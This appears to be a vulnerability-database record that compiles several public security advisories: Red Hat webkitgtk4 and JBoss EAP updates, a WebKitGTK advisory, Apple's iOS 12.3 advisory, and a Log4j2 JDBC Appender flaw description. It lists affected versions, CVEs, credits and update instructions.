webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-2.el7.noarch.rpm
x86_64:
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
ppc64:
webkitgtk4-2.28.2-2.el7.ppc.rpm
webkitgtk4-2.28.2-2.el7.ppc64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc64.rpm
webkitgtk4-jsc-2.28.2-2.el7.ppc.rpm
webkitgtk4-jsc-2.28.2-2.el7.ppc64.rpm
ppc64le:
webkitgtk4-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-devel-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-jsc-2.28.2-2.el7.ppc64le.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.ppc64le.rpm
s390x:
webkitgtk4-2.28.2-2.el7.s390.rpm
webkitgtk4-2.28.2-2.el7.s390x.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.s390.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.s390x.rpm
webkitgtk4-jsc-2.28.2-2.el7.s390.rpm
webkitgtk4-jsc-2.28.2-2.el7.s390x.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-2.el7.noarch.rpm
ppc64:
webkitgtk4-debuginfo-2.28.2-2.el7.ppc.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.ppc64.rpm
webkitgtk4-devel-2.28.2-2.el7.ppc.rpm
webkitgtk4-devel-2.28.2-2.el7.ppc64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.ppc.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.ppc64.rpm
s390x:
webkitgtk4-debuginfo-2.28.2-2.el7.s390.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.s390x.rpm
webkitgtk4-devel-2.28.2-2.el7.s390.rpm
webkitgtk4-devel-2.28.2-2.el7.s390x.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.s390.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.s390x.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
webkitgtk4-2.28.2-2.el7.src.rpm
x86_64:
webkitgtk4-2.28.2-2.el7.i686.rpm
webkitgtk4-2.28.2-2.el7.x86_64.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.i686.rpm
webkitgtk4-debuginfo-2.28.2-2.el7.x86_64.rpm
webkitgtk4-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-devel-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-2.28.2-2.el7.x86_64.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.i686.rpm
webkitgtk4-jsc-devel-2.28.2-2.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
noarch:
webkitgtk4-doc-2.28.2-2.el7.noarch.rpm
These packages are GPG signed by Red Hat for security. References:
https://access.redhat.com/security/cve/CVE-2019-6237
https://access.redhat.com/security/cve/CVE-2019-6251
https://access.redhat.com/security/cve/CVE-2019-8506
https://access.redhat.com/security/cve/CVE-2019-8524
https://access.redhat.com/security/cve/CVE-2019-8535
https://access.redhat.com/security/cve/CVE-2019-8536
https://access.redhat.com/security/cve/CVE-2019-8544
https://access.redhat.com/security/cve/CVE-2019-8551
https://access.redhat.com/security/cve/CVE-2019-8558
https://access.redhat.com/security/cve/CVE-2019-8559
https://access.redhat.com/security/cve/CVE-2019-8563
https://access.redhat.com/security/cve/CVE-2019-8571
https://access.redhat.com/security/cve/CVE-2019-8583
https://access.redhat.com/security/cve/CVE-2019-8584
https://access.redhat.com/security/cve/CVE-2019-8586
https://access.redhat.com/security/cve/CVE-2019-8587
https://access.redhat.com/security/cve/CVE-2019-8594
https://access.redhat.com/security/cve/CVE-2019-8595
https://access.redhat.com/security/cve/CVE-2019-8596
https://access.redhat.com/security/cve/CVE-2019-8597
https://access.redhat.com/security/cve/CVE-2019-8601
https://access.redhat.com/security/cve/CVE-2019-8607
https://access.redhat.com/security/cve/CVE-2019-8608
https://access.redhat.com/security/cve/CVE-2019-8609
https://access.redhat.com/security/cve/CVE-2019-8610
https://access.redhat.com/security/cve/CVE-2019-8611
https://access.redhat.com/security/cve/CVE-2019-8615
https://access.redhat.com/security/cve/CVE-2019-8619
https://access.redhat.com/security/cve/CVE-2019-8622
https://access.redhat.com/security/cve/CVE-2019-8623
https://access.redhat.com/security/cve/CVE-2019-8625
https://access.redhat.com/security/cve/CVE-2019-8644
https://access.redhat.com/security/cve/CVE-2019-8649
https://access.redhat.com/security/cve/CVE-2019-8658
https://access.redhat.com/security/cve/CVE-2019-8666
https://access.redhat.com/security/cve/CVE-2019-8669
https://access.redhat.com/security/cve/CVE-2019-8671
https://access.redhat.com/security/cve/CVE-2019-8672
https://access.redhat.com/security/cve/CVE-2019-8673
https://access.redhat.com/security/cve/CVE-2019-8674
https://access.redhat.com/security/cve/CVE-2019-8676
https://access.redhat.com/security/cve/CVE-2019-8677
https://access.redhat.com/security/cve/CVE-2019-8678
https://access.redhat.com/security/cve/CVE-2019-8679
https://access.redhat.com/security/cve/CVE-2019-8680
https://access.redhat.com/security/cve/CVE-2019-8681
https://access.redhat.com/security/cve/CVE-2019-8683
https://access.redhat.com/security/cve/CVE-2019-8684
https://access.redhat.com/security/cve/CVE-2019-8686
https://access.redhat.com/security/cve/CVE-2019-8687
https://access.redhat.com/security/cve/CVE-2019-8688
https://access.redhat.com/security/cve/CVE-2019-8689
https://access.redhat.com/security/cve/CVE-2019-8690
https://access.redhat.com/security/cve/CVE-2019-8707
https://access.redhat.com/security/cve/CVE-2019-8710
https://access.redhat.com/security/cve/CVE-2019-8719
https://access.redhat.com/security/cve/CVE-2019-8720
https://access.redhat.com/security/cve/CVE-2019-8726
https://access.redhat.com/security/cve/CVE-2019-8733
https://access.redhat.com/security/cve/CVE-2019-8735
https://access.redhat.com/security/cve/CVE-2019-8743
https://access.redhat.com/security/cve/CVE-2019-8763
https://access.redhat.com/security/cve/CVE-2019-8764
https://access.redhat.com/security/cve/CVE-2019-8765
https://access.redhat.com/security/cve/CVE-2019-8766
https://access.redhat.com/security/cve/CVE-2019-8768
https://access.redhat.com/security/cve/CVE-2019-8769
https://access.redhat.com/security/cve/CVE-2019-8771
https://access.redhat.com/security/cve/CVE-2019-8782
https://access.redhat.com/security/cve/CVE-2019-8783
https://access.redhat.com/security/cve/CVE-2019-8808
https://access.redhat.com/security/cve/CVE-2019-8811
https://access.redhat.com/security/cve/CVE-2019-8812
https://access.redhat.com/security/cve/CVE-2019-8813
https://access.redhat.com/security/cve/CVE-2019-8814
https://access.redhat.com/security/cve/CVE-2019-8815
https://access.redhat.com/security/cve/CVE-2019-8816
https://access.redhat.com/security/cve/CVE-2019-8819
https://access.redhat.com/security/cve/CVE-2019-8820
https://access.redhat.com/security/cve/CVE-2019-8821
https://access.redhat.com/security/cve/CVE-2019-8822
https://access.redhat.com/security/cve/CVE-2019-8823
https://access.redhat.com/security/cve/CVE-2019-8835
https://access.redhat.com/security/cve/CVE-2019-8844
https://access.redhat.com/security/cve/CVE-2019-8846
https://access.redhat.com/security/cve/CVE-2019-11070
https://access.redhat.com/security/cve/CVE-2020-3862
https://access.redhat.com/security/cve/CVE-2020-3864
https://access.redhat.com/security/cve/CVE-2020-3865
https://access.redhat.com/security/cve/CVE-2020-3867
https://access.redhat.com/security/cve/CVE-2020-3868
https://access.redhat.com/security/cve/CVE-2020-3885
https://access.redhat.com/security/cve/CVE-2020-3894
https://access.redhat.com/security/cve/CVE-2020-3895
https://access.redhat.com/security/cve/CVE-2020-3897
https://access.redhat.com/security/cve/CVE-2020-3899
https://access.redhat.com/security/cve/CVE-2020-3900
https://access.redhat.com/security/cve/CVE-2020-3901
https://access.redhat.com/security/cve/CVE-2020-3902
https://access.redhat.com/security/cve/CVE-2020-10018
https://access.redhat.com/security/cve/CVE-2020-11793
https://access.redhat.com/security/updates/classification/#moderate
https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/7.9_release_notes/index
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc. ------------------------------------------------------------------------
WebKitGTK and WPE WebKit Security Advisory WSA-2019-0003
------------------------------------------------------------------------
Date reported : May 20, 2019
Advisory ID : WSA-2019-0003
WebKitGTK Advisory URL :
https://webkitgtk.org/security/WSA-2019-0003.html
WPE WebKit Advisory URL :
https://wpewebkit.org/security/WSA-2019-0003.html
CVE identifiers : CVE-2019-6237, CVE-2019-8571, CVE-2019-8583,
CVE-2019-8584, CVE-2019-8586, CVE-2019-8587,
CVE-2019-8594, CVE-2019-8595, CVE-2019-8596,
CVE-2019-8597, CVE-2019-8601, CVE-2019-8607,
CVE-2019-8608, CVE-2019-8609, CVE-2019-8610,
CVE-2019-8615, CVE-2019-8611, CVE-2019-8619,
CVE-2019-8622, CVE-2019-8623.
CVE-2019-6237
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to G. Geshev working with Trend Micro Zero Day Initiative,
Liu Long of Qihoo 360 Vulcan Team.
CVE-2019-8571
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to 01 working with Trend Micro's Zero Day Initiative.
CVE-2019-8583
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to sakura of Tencent Xuanwu Lab, jessica (@babyjess1ca_) of
Tencent Keen Lab, and dwfault working at ADLab of Venustech.
CVE-2019-8584
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to G. Geshev of MWR Labs working with Trend Micro Zero Day
Initiative.
CVE-2019-8586
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to an anonymous researcher.
CVE-2019-8587
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to G. Geshev working with Trend Micro Zero Day Initiative.
CVE-2019-8594
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to Suyoung Lee and Sooel Son of KAIST Web Security & Privacy
Lab and HyungSeok Han and Sang Kil Cha of KAIST SoftSec Lab.
CVE-2019-8595
Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
Credit to G. Geshev from MWR Labs working with Trend Micro Zero Day
Initiative.
CVE-2019-8596
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to Wen Xu of SSLab at Georgia Tech.
CVE-2019-8597
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to 01 working with Trend Micro Zero Day Initiative.
CVE-2019-8601
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to Fluoroacetate working with Trend Micro's Zero Day
Initiative.
CVE-2019-8607
Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
Credit to Junho Jang and Hanul Choi of LINE Security Team.
CVE-2019-8608
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to G. Geshev working with Trend Micro Zero Day Initiative.
CVE-2019-8609
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to Wen Xu of SSLab, Georgia Tech.
CVE-2019-8610
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to Anonymous working with Trend Micro Zero Day Initiative.
CVE-2019-8615
Versions affected: WebKitGTK and WPE WebKit before 2.24.2.
Credit to G. Geshev from MWR Labs working with Trend Micro's Zero
Day Initiative.
CVE-2019-8611
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to Samuel Gro\xdf of Google Project Zero.
CVE-2019-8619
Versions affected: WebKitGTK and WPE WebKit before 2.24.1.
Credit to Wen Xu of SSLab at Georgia Tech and Hanqing Zhao of
Chaitin Security Research Lab.
CVE-2019-8622
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to Samuel Gro\xdf of Google Project Zero.
CVE-2019-8623
Versions affected: WebKitGTK and WPE WebKit before 2.24.0.
Credit to Samuel Gro\xdf of Google Project Zero.
We recommend updating to the latest stable versions of WebKitGTK and WPE
WebKit. It is the best way to ensure that you are running safe versions
of WebKit. Please check our websites for information about the latest
stable releases.
Further information about WebKitGTK and WPE WebKit security advisories
can be found at: https://webkitgtk.org/security.html or
https://wpewebkit.org/security/.
The WebKitGTK and WPE WebKit team,
May 20, 2019
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2019-5-13-1 iOS 12.3
iOS 12.3 is now available and addresses the following:
AppleFileConduit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8593: Dany Lisiansky (@DanyL931)
Contacts
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to read restricted memory
Description: An input validation issue was addressed with improved
input validation.
CVE-2019-8598: Omer Gull of Checkpoint Research
CoreAudio
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted movie file may lead to
arbitrary code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8585: riusksk of VulWar Corp working with Trend Micro's Zero
Day Initiative
Disk Images
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-8560: Nikita Pupyshev of Bauman Moscow State Technological
University
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to execute arbitrary code
with system privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2019-8605: Ned Williamson working with Google Project Zero
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to cause unexpected system
termination or read kernel memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-8576: Brandon Azad of Google Project Zero, unho Jang and
Hanul Choi of LINE Security Team
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to cause unexpected system
termination or write kernel memory
Description: A type confusion issue was addressed with improved
memory handling.
CVE-2019-8591: Ned Williamson working with Google Project Zero
Lock Screen
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A person with physical access to an iOS device may be able to
see the email address used for iTunes
Description: A logic issue was addressed with improved restrictions.
CVE-2019-8599: Jeremy Peña-Lopez (aka Radio) of the University of
North Florida
Mail
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted message may lead to a denial
of service
Description: An input validation issue was addressed with improved
input validation.
CVE-2019-8626: Natalie Silvanovich of Google Project Zero
Mail Message Framework
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A remote attacker may be able to cause arbitrary code
execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2019-8613: Natalie Silvanovich of Google Project Zero
MobileInstallation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to modify protected parts of the
file system
Description: A validation issue existed in the handling of symlinks.
CVE-2019-8568: Dany Lisiansky (@DanyL931)
MobileLockdown
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to gain root privileges
Description: An input validation issue was addressed with improved
input validation.
CVE-2019-8637: Dany Lisiansky (@DanyL931)
Photos Storage
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2019-8617: an anonymous researcher
SQLite
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to gain elevated privileges
Description: An input validation issue was addressed with improved
memory handling.
CVE-2019-8577: Omer Gull of Checkpoint Research
SQLite
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A maliciously crafted SQL query may lead to arbitrary code
execution
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2019-8600: Omer Gull of Checkpoint Research
SQLite
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to read restricted memory
Description: An input validation issue was addressed with improved
input validation.
CVE-2019-8598: Omer Gull of Checkpoint Research
SQLite
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A memory corruption issue was addressed by removing the
vulnerable code.
CVE-2019-8602: Omer Gull of Checkpoint Research
Status Bar
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: The lock screen may show a locked icon after unlocking
Description: The issue was addressed with improved UI handling.
CVE-2019-8630: Jon M. Morlan
StreamingZip
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to modify protected parts of the
file system
Description: A validation issue existed in the handling of symlinks.
CVE-2019-8568: Dany Lisiansky (@DanyL931)
sysdiagnose
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8574: Dayton Pidhirney (@_watbulb) of Seekintoo (@seekintoo)
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may result in the
disclosure of process memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-6237: G. Geshev from MWR Labs working with Trend Micro's
Zero Day Initiative
CVE-2019-8619: Wen Xu of SSLab at Georgia Tech and
Hanqing Zhao of Chaitin Security Research Lab
CVE-2019-8622: Samuel Groß of Google Project Zero
CVE-2019-8623: Samuel Groß of Google Project Zero
CVE-2019-8628: Wen Xu of SSLab at Georgia Tech and
Hanqing Zhao of Chaitin Security Research Lab
Wi-Fi
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A device may be passively tracked by its WiFi MAC address
Description: A user privacy issue was addressed by removing the
broadcast MAC address.
CVE-2019-8620: David Kreitschmann and Milan Stute of Secure Mobile
Networking Lab at Technische Universität Darmstadt
Additional recognition
Clang
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
CoreFoundation
We would like to acknowledge Vozzie and Rami and m4bln, Xiangqian
Zhang, Huiming Liu of Tencent's Xuanwu Lab for their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero and
an anonymous researcher for their assistance.
MediaLibrary
We would like to acknowledge Angel Ramirez and Min (Spark) Zheng,
Xiaolong Bai of Alibaba Inc. for their assistance.
MobileInstallation
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
Safari
We would like to acknowledge Ben Guild (@benguild) for their
assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 12.3".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlzZrUopHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3FJJxAA
hLu4GEYEBPNLxDWhh49P7k7pe33N8cguJw2iPt6sYkF9swBwzL1AC1y0WiNJejGT
Y0PPMG7evpaEVGQwCZvHarNT4g35OUeHdHy4gYAIPfTY15G25jmELL4YTJutWQ0O
z6KseXhEq9EqpHKlsT5Q6QOEoUyXVHan33d+H9+4t/jQHFvDqMmwHWO7bKlYyhWW
ctG8jbXSgy/OFjSrmbPhfbBfDXQHah8GsFGJAFtlWk+UtQhXNifJT1tj9XAKDtGK
V5EQ/hYkYRyyeNPXLiZ/wn6Jesbg8QIrmZB2RHAl1w8XZZY2Gsd1//dTXqn1LkqK
gwOV0+Vs//LJwIqix435KKc0ULMwJjIfKy9whzPyf+4lqcD4kx4OdQrakZz4+L7g
4ZZeeyJ0LFFnO4eavtn6lVrYcTXVhJlRkJ6cWZcf9Dfr28bPTSSHda1Nd9quZFJn
QPFt7CHRPL1MelgfDKZNeTy7WUDnoTwbdMZCyd0MszCxCeaSahny7066jmfKyXGI
OoQQyyz96OmBABcqG3WeCRSeJ3ymmoy2d+JzjA4boIHo4k+nq5ifKikyI8qiHIBB
uS3K3DEzMSj/0u2vNcDMjQ6vogbxeWnK8fxCCxkfedYZEdHg4Oj4lK1HStbhweoJ
cB3S2pWUIPt8HRcnbUYgypZ0ZJgtnTom+0mgi3a0+64=
=fsAj
-----END PGP SIGNATURE-----
|
|
var-202112-2011
|
Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack when a configuration uses a JDBC Appender with a JNDI LDAP data source URI when an attacker has control of the target LDAP server. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2. Apache Log4j is a Java-based open source logging tool of the Apache Foundation. Apache Log4j2 2.0-beta7 to 2.17.0 versions have a security vulnerability, which stems from the lack of effective protection and filtering for JDBC Appender and JNDI in the software. The purpose of this
text-only errata is to inform you about the security issues fixed in this
release.
Installation instructions are available from the Fuse product documentation
pages:
Fuse 7.8:
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/installing_on_apache_karaf/apply-hotfix-patch
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.8/html/deploying_into_spring_boot/patch-red-hat-fuse-applications
Fuse 7.9:
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/installing_on_apache_karaf/apply-hotfix-patch
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.9/html/deploying_into_spring_boot/patch-red-hat-fuse-applications
Fuse 7.10:
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/installing_on_apache_karaf/apply-hotfix-patch
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.10/html/deploying_into_spring_boot/patch-red-hat-fuse-applications
4.
The References section of this erratum contains a download link for the
update. You must be logged in to download the update. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Low: Red Hat JBoss Enterprise Application Platform 7.4.4 security update
Advisory ID: RHSA-2022:1297-01
Product: Red Hat JBoss Enterprise Application Platform
Advisory URL: https://access.redhat.com/errata/RHSA-2022:1297
Issue date: 2022-04-11
CVE Names: CVE-2021-4104 CVE-2021-44832 CVE-2021-45046
CVE-2021-45105 CVE-2022-23302 CVE-2022-23305
CVE-2022-23307
=====================================================================
1. Summary:
A security update is now available for Red Hat JBoss Enterprise Application
Platform 7.4 for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact
of Low. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat JBoss EAP 7.4 for RHEL 8 - noarch, x86_64
3. Description:
Red Hat JBoss Enterprise Application Platform 7 is a platform for Java
applications based on the WildFly application runtime.
This release of Red Hat JBoss Enterprise Application Platform 7.4.4 serves
as a replacement for Red Hat JBoss Enterprise Application Platform 7.4.3
and includes bug fixes and enhancements. See the Red Hat JBoss Enterprise
Application Platform 7.4.4 Release Notes for information about the most
significant bug fixes and enhancements included in this release.
Security Fix(es):
* log4j: SQL injection in Log4j 1.x when application is configured to use
JDBCAppender (CVE-2022-23305)
* log4j: Unsafe deserialization flaw in Chainsaw log viewer
(CVE-2022-23307)
* log4j: Remote code execution in Log4j 1.x when application is configured
to use JMSAppender (CVE-2021-4104)
* log4j-core: remote code execution via JDBC Appender (CVE-2021-44832)
* log4j-core: DoS in log4j 2.x with thread context message pattern and
context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)
* log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data
contains a recursive lookup and context lookup pattern (CVE-2021-45105)
* log4j: Remote code execution in Log4j 1.x when application is configured
to use JMSSink (CVE-2022-23302)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
4. Solution:
Before applying this update, back up your existing Red Hat JBoss Enterprise
Application Platform installation and deployed applications.
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
2031667 - CVE-2021-4104 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender
2032580 - CVE-2021-45046 log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)
2034067 - CVE-2021-45105 log4j-core: DoS in log4j 2.x with Thread Context Map (MDC) input data contains a recursive lookup and context lookup pattern
2035951 - CVE-2021-44832 log4j-core: remote code execution via JDBC Appender
2041949 - CVE-2022-23302 log4j: Remote code execution in Log4j 1.x when application is configured to use JMSSink
2041959 - CVE-2022-23305 log4j: SQL injection in Log4j 1.x when application is configured to use JDBCAppender
2041967 - CVE-2022-23307 log4j: Unsafe deserialization flaw in Chainsaw log viewer
6. JIRA issues fixed (https://issues.jboss.org/):
JBEAP-22105 - (7.4.z) Upgrade from com.io7m.xom:xom 1.2.10 to xom:xom 1.3.7
JBEAP-22385 - (7.4.z) Upgrade ASM from 7.1 to 9.1
JBEAP-22731 - (7.4.z) Upgrade Artemis from 2.16.0.redhat-00032 to 2.16.0.redhat-00034
JBEAP-22738 - (7.4.z) Upgrade jbossws-cxf from 5.4.2.Final to 5.4.4.Final(Fix UsernameTokenElytronTestCase on SE 17)
JBEAP-22819 - [GSS] (7.4.z) HAL-1762 - Aliases are removed from the credential store when passwords are updated from the admin console
JBEAP-22839 - [GSS](7.4.z) Upgrade yasson from 1.0.9.redhat-00001 to 1.0.10.redhat-00001
JBEAP-22864 - (7.4.z) Upgrade HAL from 3.3.8.Final-redhat-00001 to 3.3.9.Final-redhat-00001
JBEAP-22900 - Tracker bug for the EAP 7.4.4 release for RHEL-8
JBEAP-22904 - (7.4.z) Upgrade Hibernate ORM from 5.3.24.Final-redhat-00001 to 5.3.25.Final-redhat-00002
JBEAP-22911 - (7.4.z) Upgrade OpenSSL from 2.1.3.Final-redhat-00001 to 2.2.0.Final-redhat-00001
JBEAP-22912 - (7.4.z) Upgrade OpenSSL Natives from 2.1.0.SP01-redhat-00001 to 2.2.0.Final-redhat-00001
JBEAP-22913 - (7.4.z) Upgrade WildFly Core from 15.0.6.Final-redhat-00003 to 15.0.7.Final-redhat-00001
JBEAP-22935 - (7.4.z) Upgrade jboss-vfs from 3.2.15.Final-redhat-00001 to 3.2.16.Final-redhat-00001
JBEAP-22945 - (7.4.z) Upgrade org.apache.logging.log4j from 2.14.0.redhat-00002 to 2.17.1.redhat-00001
JBEAP-22973 - (7.4.z) Upgrade Elytron from 1.15.9.Final-redhat-00001 to 1.15.11.Final-redhat-00002
